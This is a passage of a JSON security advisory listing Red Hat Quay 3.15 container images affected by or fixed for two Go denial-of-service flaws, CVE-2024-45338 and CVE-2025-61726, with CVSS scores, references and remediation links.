"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto"
},
{
"cve": "CVE-2024-45338",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2024-12-18T21:00:59.938173+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2333122"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/net/html. This flaw allows an attacker to craft input to the parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This issue can cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/net/html: Non-linear parsing of case-insensitive content in golang.org/x/net/html",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as an Important severity because an attacker can craft malicious input that causes the parsing functions to process data non-linearly, resulting in significant delays which leads to a denial of service by exhausting system resources.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45338"
},
{
"category": "external",
"summary": "RHBZ#2333122",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333122"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45338"
},
{
"category": "external",
"summary": "https://go.dev/cl/637536",
"url": "https://go.dev/cl/637536"
},
{
"category": "external",
"summary": "https://go.dev/issue/70906",
"url": "https://go.dev/issue/70906"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ",
"url": "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3333",
"url": "https://pkg.go.dev/vuln/GO-2024-3333"
}
],
"release_date": "2024-12-18T20:38:22.660000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/net/html: Non-linear parsing of case-insensitive content in golang.org/x/net/html"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
